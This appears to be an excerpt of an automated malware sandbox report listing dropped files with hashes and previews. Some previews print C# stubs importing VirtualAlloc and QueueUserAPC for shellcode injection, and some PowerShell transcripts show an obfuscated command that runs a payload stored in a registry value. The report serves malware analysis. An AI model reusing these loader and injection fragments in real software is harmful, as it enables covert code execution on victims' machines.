                  SSDEEP:24:KBId3ka6KH0oE80nKaM5DqBVKVrdFAMBJTH:Ukka6A0oE80nKxDcVKdBJj
                  MD5:69D57DC70587EE41EE6FC274B97FBDC4
                  SHA1:FC2A8C8DB75263ABD2ED0ADCD6D239384B3D9D29
                  SHA-256:18A0DB10515984FBFFF5A28AD3AB93F471F4ABBC0F84CEA4BB9D1232A6FD5E19
                  SHA-512:8A821A329AB1813CDB71CE5E5451619E2CE108AB0261FAE2FAD6C1167806304109B25A766451FD1A69E0EC45C6914E65D4D203C8CAD4C59363F65D63AB72C5C3
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):394
                  Entropy (8bit):4.954749753951787
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJqvFMmMRSRa+eNMjSSRrA3/MLqevVSRN9HRRcMzy:V/DTLDfuKFMM9eg5rmMOe8nRRcQy
                  MD5:4F00714F1C09E141DB020803EA09579D
                  SHA1:D7980DF2EB35C87A8B0970CACD97DB01F3AF3053
                  SHA-256:3849E6268E834D1AE7C9D9C9A8073383600D6E3B16FCF19D4EDA5AEFD3AB702C
                  SHA-512:27A50F4C4E088993854043C472B93BB3E4D4B49942349A2A320DECD7E1F4F50FDF55C0ADAC1929626767E670B6DF94EE020CC8794D70C11CDC11D58043EF14A4
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class uai. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint vjsthgo,uint ssavaddinvx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr gexlvnsp,uint sjhv,uint hya,uint gdlnrobpny);.. }..}.
                  C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.2623236115134135
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fw2Uzxs7+AEszIWXp+N23fwYxn:p37Lvkmb6KHdUWZE8H
                  MD5:7AFBF2E681460BED047FE8606BB88A8B
                  SHA1:8BD211876DE82170D6D0B4BB4E5CE5D2593021B6
                  SHA-256:4EBBA379828F24674CB618231BCD93CA520B607BA69376738955CA2D209BE68B
                  SHA-512:B6A022C58973BFF36AC564C8C5912041FE07B8C1BFAE2881F42066D5AC8474190A53795F5C8441AD63531F02232C0F1CA0AE805D160CCCB6B3CDD85B3A7AB480
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.0.cs"
                  C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:dropped
                  Size (bytes):869
                  Entropy (8bit):5.323550511577163
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHd1E8OKaM5DqBVKVrdFAMBJTH:Ukka6Ad1E8OKxDcVKdBJj
                  MD5:81CD4AC130F4B307EE5B4E0E15CCC0E5
                  SHA1:15E1B28E3690B20C95A3475AF35DD7B9C4F38C8E
                  SHA-256:99BCBB563864549E10FFE9DEEFCEB7FC2E849EC57B1373929727868AD7D38138
                  SHA-512:349E5DF5AB221BC793AF73A95A0A4EC733EEBB311BDD5C9DDB9026A0D34D2245E9D11D4FC03D96EE495BF8EA0F5E361E6D4D787FA1EAF1836EFED147EA426860
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):652
                  Entropy (8bit):3.0934843000967462
                  Encrypted:false
                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAGak7YnqqxXPN5Dlq5J:+RI+ycuZhN+GakSxXPNnqX
                  MD5:9174B218226BE56C4CD87EE735492908
                  SHA1:582CB61774C2D7A46D907227164240507FB1BDB2
                  SHA-256:59A46E7B85BD7402B2A768A58E25135C88AD1F6D757909FF2D80286B447BA0A8
                  SHA-512:D20690D5C6530C8F8D7036D9BB4361B61D476A8C39D8D97F1A10F1FB4E4954E0C535AC4535B44E613E9C355856CC6AF684EC2E859A23A10B16907BD044FAD579
                  Malicious:false
                  Reputation:unknown
                  Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.y.c.r.j.y.0.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.y.c.r.j.y.0.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.0.cs
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text
                  Category:dropped
                  Size (bytes):404
                  Entropy (8bit):5.001750205738985
                  Encrypted:false
                  SSDEEP:6:V/DsYLDS81zuJMQGMRSR7a1kqcmYWSRa+rVSSRnA/fepw6V2XeYy:V/DTLDfuQabYN9rV5nA/2+6V+zy
                  MD5:E67A79EEB8705BEA96347DF090918E43
                  SHA1:95FF21FB152D1292B6DCDD128421D4EC938E2D48
                  SHA-256:D808E7944F6D224E6207EAD29CB1B7DD234016FC9C0AA7B7208FC7D6233E4CD8
                  SHA-512:9F3EAD7E7320BB8D1BD336FF39A08FF2554240DD71A9C2931D8BB849B82FAF2FE14CA5222E5F3D9DC9F4897C9B4AF3AB9D05CA77924C7B3C38107A83CA85E51B
                  Malicious:false
                  Reputation:unknown
                  Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class lguxor. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr lsfjmn,IntPtr xxqh,IntPtr xyrmxbtxwnl);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint mekkcqcdoju,uint nau,IntPtr tamno);.. }..}.
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                  Category:dropped
                  Size (bytes):369
                  Entropy (8bit):5.256621337379964
                  Encrypted:false
                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fJnlnPcw0zxs7+AEszIWXp+N23fJx:p37Lvkmb6KHhxB0WZE8hxLn
                  MD5:3968715CE41315ECCD76459D8A7F9904
                  SHA1:A4F872BA3AB3C44F202B265FADC8481700B3F35C
                  SHA-256:098EF14FF7C24D658FBF01AA1C81C7A8880A80806EB977A528CA2CC965771129
                  SHA-512:8B26FC4C452985438EB9DB5A4F997919D3B65284E33C7268B30B2B8664314376EA1649BD52C883974575A30DB8CF7BCC41E416CC7D87CC3FCC1DD46301F2D9D2
                  Malicious:false
                  Reputation:unknown
                  Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.0.cs"
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):3584
                  Entropy (8bit):2.618769412218819
                  Encrypted:false
                  SSDEEP:24:etGS+8OmU0t3lm85z7ntQW6gfgy4G4laUtkZfdB1PVUWI+ycuZhN+GakSxXPNnq:64XQ3r5uyIarJd7d31ulfa3Dq
                  MD5:14794C5CBC72372901D57A29463D22ED
                  SHA1:E3ACB06DEC8EC09BE03058791EC488C21E851921
                  SHA-256:524F5BBA17D2276F5D9C399869EEAFEAD277AB4C1522EDB2E80AFCC93CBCE4B8
                  SHA-512:C09DA7EB7A67A0569AB3851E5519D4AE7EB3EF4AEF9C53C232BDDF705538B4FC6D8CC2F2C8FDFC5BBB5228EBFB85AC94F452D3410AE3AF573594447D81C2B178
                  Malicious:false
                  Reputation:unknown
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ F............ Y.....P ......d.........j.....q.....v.....................d. ...d...!.d.%...d.......*.....3.1.....9.......F.......Y...........
                  C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.out
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):869
                  Entropy (8bit):5.339496088869603
                  Encrypted:false
                  SSDEEP:24:KBId3ka6KHXBVE8XLuKaM5DqBVKVrdFAMBJTH:Ukka6AXBVE8XKKxDcVKdBJj
                  MD5:DD1A32B626FFCFCA67E15CE3537C5FC7
                  SHA1:9BBB242076BB8503966A9AE8AB393AA8B51FC046
                  SHA-256:006F5049A96F0532763D824FAF59B2D067367FCDB6E08BFC78525DF97BB19337
                  SHA-512:2C1BC12D6031A7835888541E9BF66F08C4D43890F39043CCC6918B20035B754560A9FED2D1687289A65BA3BF7A67550C439C54B2372130080D6B34E357518C98
                  Malicious:false
                  Reputation:unknown
                  Preview: .C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                  C:\Users\user\AppData\Local\Temp\~DF1A1A38B1DEC70135.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2949748206217375
                  Encrypted:false
                  SSDEEP:24:i9l8Tfb2NOfZ8NtzT4BVleaTMg3PYW5KygBW:PmOfZctylBMg3tKyg
                  MD5:895CBAD826E1ACC5ABFE50890B0C45A6
                  SHA1:75E03ECA141239CFAD81E6AE7955616DF8CE5914
                  SHA-256:0534D5B0990ACC36F3496371610F116BF449249C542CF6EF60DFB179BFAD57B1
                  SHA-512:DF5010049F6315988527EE2EC93D04BED10A7A7D64674B276717EB604F7EDDD736D7C9770820D45EA2F1D3112D96788619D760A861248C75020A3F6618FEDFF8
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF1E4DB491563E663B.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.3016902554707898
                  Encrypted:false
                  SSDEEP:12:i9lsqatYod2DzwwvzGeWq8FgKl843F32MrLc8lKFptlTyab+I2M49vtQbbe+/F:i9lsEod2fwcOq8Fg8xNlKjXb63MHbT
                  MD5:0052BDBC1282CCD1768F091C6765BB65
                  SHA1:9DD99E79720EDF82C3CC9931534C470F61AEDD82
                  SHA-256:F2BAA2D36BB43942303670076B6CE541563EF057D1D7F066919F71099A66462E
                  SHA-512:F8B221100651EB0E3A60000CBE62B355E12143BE0F09B16F5AE7FBEF2224FEA7B3DEF34C9FE9F2331DDC406C15A8892AD6AEB0D9B2E6ECC6B003D01352A0D70B
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF228A52FBB344471E.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2930658705886158
                  Encrypted:false
                  SSDEEP:24:i9lxPkfX7s5Fc6lyxez5lLemyKmb9+/F/nubpy:UPkfX7s7cuRcmyK49+/
                  MD5:DA0A40C938FB4094F95460636DA9A678
                  SHA1:539DF81C5D201FD3FF86B5A3A941AEE5B7E30F4A
                  SHA-256:206569E054E8F7A7C1B201322A008076EC70EEF3EC210F053C76042AF435C4B1
                  SHA-512:A493F77EB36879FD599B7C1106F713EE5344DCB2652C9E275661B97F352F4067F73CC636A75540A8080380AD04C1CD5EB5DA12C7D5ACB6FEB4CA830CFA703775
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF310076119A1B03ED.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2944924438145546
                  Encrypted:false
                  SSDEEP:12:i9lcat/yj6DzA+IAdT7YkZkyvlVNKJ2lPMNlvg8CyXaKf/hM61/bhMD4/F:i9lRg6fA+IU8kayvvsdgCm61Vo4
                  MD5:A914F0DE4240B44E7DCB879209B08F41
                  SHA1:326B3A412D22D59B831ED162643094F5A55CF755
                  SHA-256:8384216E9C57451B1E6EDBBB50E9143779B66FFEBEE28F5D4F1626788D3C8051
                  SHA-512:552EB3F6A128F3BD904DD3A8915529FA8060E71255BB3BAF86C9CCBE4D57F089CE360B7D99C5DFF3F861CEFE064DFD0CB03FCAA197E139665B59B757BB3CC836
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF3F633016F59AC3E1.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.3000156607787352
                  Encrypted:false
                  SSDEEP:12:i9lIqat0qwDzDOshZGAt0gonblc4RWYCQgKKgpKcYrp6/Jd7LhGjS/F:i9llqwfDOaGIpmq7apgpqN6S
                  MD5:D2304AF6095A03016E1CD21F7027CFF7
                  SHA1:D3E4AF6EF7AC436E8BEDE69014E9D3709BBFF21F
                  SHA-256:F2BC48DC81609B1D0531C4A88714E503904C6FFE35F3125032CF1893FD811995
                  SHA-512:1CBA9848ACBAA6E62A37AD9617C98B75512E2ACAE3C8E6B45435F3BD46C301599A3D2D4AD3F6D05D4C24535444C769C59A90ED1EA45B7476B327886AE6C87632
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF5CE6EAEE725046DD.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2932892700170092
                  Encrypted:false
                  SSDEEP:24:i9lRk6fXY/A7Gcl1JNHyOu8Fq6oQlEB2:ck6fXYkGcvTVFqXwEB
                  MD5:CB4DFAFB5A3C048C2791A9888F379B68
                  SHA1:86DCF318E57BEEABD3D53B9A44A3CD4FA026833C
                  SHA-256:8C493E52BA6AA75526E00A885199B55C8EEAE82EABE0105C340EF948F63A2F5B
                  SHA-512:A8F9A1E02A285A92E6523470157E8FDEBAD4F13BB9424704AA5C711E78430900E2E30ED78E666DF9471CE3DCB15813C7DF482FB6E51FE6A08E746FAE70F23FAC
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF643103C7B422ACDB.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2953700888949815
                  Encrypted:false
                  SSDEEP:24:i9lRniIf9lL+JK7wu8G9y3U4r0EAKaBplyTX:0iIfz+Wd83Br00SL
                  MD5:E7543D9CC02531BEDD3B8611FBBC8A61
                  SHA1:E326CF04A0A2D419A89EB38AF8C5093E8E38DAB0
                  SHA-256:8892A94AB4643420A60A3A2C89286F64D3BD88ECFB770E48371A43057D39590E
                  SHA-512:781733A5E4546F11F5C1DBF76CB42742B888BB99670E4BD52DA37E494FA93E5D0F0981760267E6DE5A9E569FF21E9E14CB154C4800C6473B444DF03DD894DFA9
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DF7C8DCB96582EFF13.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29650611676210714
                  Encrypted:false
                  SSDEEP:24:i9lRSIf3McPRoiaPwgj5JOIFLony6Xe60h:0SIf3MqoRPZlLqyz60
                  MD5:E36866936DE454828246EACA10EF8D09
                  SHA1:A4B337B112E0E4E8DF31DB24BE240D337C2AC127
                  SHA-256:4EA33E76AF35A8707A5DA28E9B9F18D14E0A734B1FA146B54DB91E9F5A90CEF2
                  SHA-512:208C60492137A9F26F48E8981E1FEFD3825D1EAA0A350AEA15C10ED3A7CB3B2928A56E24146F02EFF2229EF98B451E069642B025BF29AD6E72FAEBCFE15DD3EE
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DFABD2BAAC7D7BDC70.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.1410711960062862
                  Encrypted:false
                  SSDEEP:6:z1/z1/sy1/rG61/c01/ZK6PEzLK8/KHEz:VVDrtcUZK6PQ+8SHQ
                  MD5:B7721FBA8FE8296F1AB62657A738E8B7
                  SHA1:037167C4F2001AA81217D3C143802781A4A14702
                  SHA-256:59785441D00FCAD3A40D46A7498F5BE50A34E755038FFE374E46606C43D65868
                  SHA-512:FE820F5E2CAD282F0C6B175E8482F6B804916FF04033760E976590427E3A862AE6633F0F7D53C9A743CBCB875B01C5106078CF7F3078F61D5B70899A42DBBF7D
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DFB5526166FCAF7E1F.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29501561334682946
                  Encrypted:false
                  SSDEEP:12:i9l8qatX9UODzSQ3GFzf4lMukQZEMpIXe5W277kO54y0FwZgFCAfYwU9a65/F:i9l8T2OfLZhNt7kO59UwZgFC4fX65
                  MD5:F07D0EB6550247A5530C1072C9394C8D
                  SHA1:119293286A527981C2280260E9C03F9DA82CABD1
                  SHA-256:F72850ACE35DD4890C28298F1546FB7779F6E8183E32A988B50F9C8BE5C6AB44
                  SHA-512:1EB69B1A8DE137AC28B1053D055037ED4585A0EAAAD2121ABFE33C8E0706C558731CB378B0221E3A044AB088EA8E260D47AE76CDC0E934E07EB551F5FF6D3949
                  Malicious:false
                  Reputation:unknown
                  C:\Users\user\AppData\Local\Temp\~DFBDF8A0AFC4330C88.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.30087301440949077
                  Encrypted:false
                  SSDEEP:12:i9lIqat0vwDzYWSUltKbrD4DevcoLxJiw/QSRQQMQKlCMHV2Tv/F:i9llvwfZfKdxxZQQ20
                  MD5:F95F3E538FA860284861F03D7F18FAD3
                  SHA1:37F54DCD2C9811053B26F7E54828A0033FC10593
                  SHA-256:CD810EAF727A62521536630A53A91F7CF05A0CC5570E655980FE7FA2130D095E
                  SHA-512:F05C1A847A55BB30992BE79FA230935C92A4DF8F4E2F0B492ACE7044FED6517E41BF6206984AF22492413F82EABA1CABF2967EAA32BE1355DA8DA1E8F644931E
                  Malicious:false
                  Reputation:unknown
                  Preview: (preview contains only non-printable bytes)
                  C:\Users\user\AppData\Local\Temp\~DFC2991413B3C0351D.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2965237099975743
                  Encrypted:false
                  SSDEEP:12:i9lQatjZIDzzIlINtSklQGmg5AvZhuUSIhMO8cQljgHeJCTK84/F:i9lRZIfzIlDkqGch7SFEwEr+84
                  MD5:5A0A24824F5BEC9F7EC3C5AB1A94A88A
                  SHA1:DA4098131DDAB009E18C43AFDC5E9A4A6A1E42EC
                  SHA-256:C8D0850AB6FF9C2FE733E20FB8A51A33E9B3161DD840C9152B640747FE959350
                  SHA-512:BCDCB45EF563435CDB0CFED6BC08454B59E11E43C3F0B3CB4287533DBB26BC06AC4E1D90F9F3E12968F4776193D12569FBC4685B9424059A2D474B5976392696
                  Malicious:false
                  Reputation:unknown
                  Preview: (preview contains only non-printable bytes)
                  C:\Users\user\AppData\Local\Temp\~DFFE80833AB219EB3E.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.30415429653347026
                  Encrypted:false
                  SSDEEP:24:i9llHJ8+fA9T2GKATH0GlZlcYJsXmMUHGCr:QHJ3fEl+X0HG
                  MD5:80ECEEABBD4A67A9AD0315D727792F38
                  SHA1:02744D740ECBF9194D60FAD771607EC90756FD2B
                  SHA-256:44F375603BBA5B476CDD422834214021E021774E2E211BAFB282F44A926F18EA
                  SHA-512:9C5582F9C188ECA670C1F1E87AAF43AD245321DD7106633037C83979FEB641F40D59C4EF46E970C79CB235B12E26D01A92F0BA38653A97101B94968FEB9CB971
                  Malicious:false
                  Reputation:unknown
                  Preview: (preview contains only non-printable bytes)
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.J0NW8DwT.20220119115047.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1142
                  Entropy (8bit):5.535457909679894
                  Encrypted:false
                  SSDEEP:24:BxSAZ1xvBn5x2DOXUW1NLCHYn4qW7HjeTKKjX4CIym1ZJXx9NLCHYn4u:BZZHvh5oOV+o4t7qDYB1ZD9+o4u
                  MD5:82FEE9B5CC379504848012D3BDA807D3
                  SHA1:F6A416ECC46600E69F0BAA57724C2C71AE6BE1BB
                  SHA-256:B5A4B7ECCB2E94C2B201F275A7EA01740ABDBDCA6F3A2BEA0BEB5F392471E3E6
                  SHA-512:45E858D68ACBE6EABEBE09739B125C47A01B4E6DFE7C4F7BAC2E216B5675E5589572630B3CCFB1BDDB6AD456BA38938CE963BE38907FF41390DDCA41F2D4CE29
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115050..**********************..PS>new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([S
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.J0uOBENL.20220119115046.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1347
                  Entropy (8bit):5.364860183350698
                  Encrypted:false
                  SSDEEP:24:BxSAZ1xvBn5x2DOXUW9l0LCHFd4qWH3HjeTKKjX4CIym1ZJXxll0LCHFd4eDnxSa:BZZHvh5oOdlLFd4tXqDYB1ZDllLFd4eV
                  MD5:76CFC3589540417A26342B0A01B51FC0
                  SHA1:8E42A82771D0F30EC1C2B20DA142F351937101C1
                  SHA-256:9385F1106060721CA9714F1BC4D7E58925E67B7AE43F8054E3C6CF00E5C675F1
                  SHA-512:2B440373E7D911E6635DDF4CCC52F597FBDD410B0F154E1433C9C3B7611DE47DE74C99616D97B8E6DE90969283871FD9F69252FBA141BA95B1578EA76D63B066
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 5008..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115050..**********************..PS>new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Te
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.MVq65tiG.20220119115053.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1359
                  Entropy (8bit):5.393462741800469
                  Encrypted:false
                  SSDEEP:24:BxSAcyxvBn5x2DOXUW9DLCHq4qW8HjeTKKjX4CIym1ZJXPDLCHq4NmnxSAZVC:BZxvh5oOdwq4t8qDYB1Z9wq4NoZZVC
